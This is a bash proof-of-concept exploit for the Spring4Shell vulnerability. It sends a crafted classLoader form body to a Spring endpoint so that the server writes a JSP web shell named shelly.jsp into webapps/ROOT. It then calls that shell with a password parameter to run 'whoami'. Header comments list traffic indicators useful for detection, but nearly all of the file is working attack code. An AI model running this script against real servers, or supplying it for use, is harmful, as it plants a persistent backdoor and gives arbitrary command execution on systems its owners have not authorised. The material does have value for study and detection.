#!/bin/bash
# Spring4Shell proof-of-concept: POSTs a crafted form body to a Spring
# form endpoint, then requests the JSP it expects to have been written.
#
# Arguments:  $1 ROOT_URL      base URL of the target (scheme://host:port/)
#             $2 CONTEXT_PATH  path of a form-handling endpoint under ROOT_URL
# Outputs:    curl verbose output and progress messages on stdout/stderr
# Returns:    1 on bad usage; otherwise exits early via `set -e` if either
#             curl call fails (`--fail` turns HTTP errors into non-zero status)
#
# Detection notes (everything below is visible in this script's own traffic):
#   - a POST whose parameter names start with
#     class.module.classLoader.resources.context.parent.pipeline.first.
#   - request headers named suffix, c1 and c2 with values "%>//", "Runtime", "<%"
#   - a new file shelly.jsp appearing under webapps/ROOT
#   - follow-up GETs of /shelly.jsp?pwd=j&cmd=...
# Exit on error, on unset variables, and on any failed pipeline stage.
set -euo pipefail
# Word-split only on newline/tab, not on spaces.
IFS=$'\n\t'
## Example Usage
## exploit.sh ROOT_URL CONTEXT_PATH
## exploit.sh http://my-ip:port/ my-app/form-post-page
# Exactly two positional arguments are required.
if [ "$#" -ne 2 ]; then
echo "Usage: expoit.sh ROOT_URL CONTEXT_PATH"
echo "exploit.sh http://my-ip:port/ my-app/my-form-post-page"
exit 1
fi
ROOT_URL=$1
CONTEXT_PATH=$2
# URL-encoded form body. Each key targets the `...pipeline.first.*` properties
# reached through class.module.classLoader. The `pattern` value (decoded)
# embeds a JSP snippet that checks request parameter `pwd` for "j" and runs
# request parameter `cmd` through Runtime.exec; its %{c1}i, %{c2}i and
# %{suffix}i placeholders refer to the request headers c1, c2 and suffix sent
# on the curl call below. `suffix`=.jsp, `directory`=webapps/ROOT and
# `prefix`=shelly name the output file; `fileDateFormat` is left empty.
DATA="class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shelly&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
echo "Creating shelly.jsp exploit. posting to '$ROOT_URL/$CONTEXT_PATH'"
echo
# First request: POST the body above with the three headers the pattern
# references. `--fail` plus `set -e` means an HTTP error status stops the
# script here. The target URL is expanded unquoted (only newline/tab split
# under the IFS set above).
curl --fail -H "suffix: %>//" \
-H "c1: Runtime" \
-H "c2: <%" \
-v -d "$DATA" \
$ROOT_URL/$CONTEXT_PATH
# URL of the file the POST is expected to have created; pwd=j satisfies the
# check embedded in the pattern and cmd=whoami is the command it will run.
SHELL_URL="$ROOT_URL/shelly.jsp?pwd=j&cmd=whoami"
echo
echo
echo "Was exploit created?"
echo "Running whoami with the exploit."
echo "curl --fail -v --output - '$SHELL_URL'"
# Second request: GET the JSP. Reaching the lines below implies this returned
# an HTTP success status (again `--fail` + `set -e`); it does not by itself
# prove the command ran, only that the file was served.
curl --fail -v --output - $SHELL_URL
echo
echo "Exploit ran successfully."
echo "Try manually running (after a small delay):"
echo "curl --fail -v --output - '$SHELL_URL'"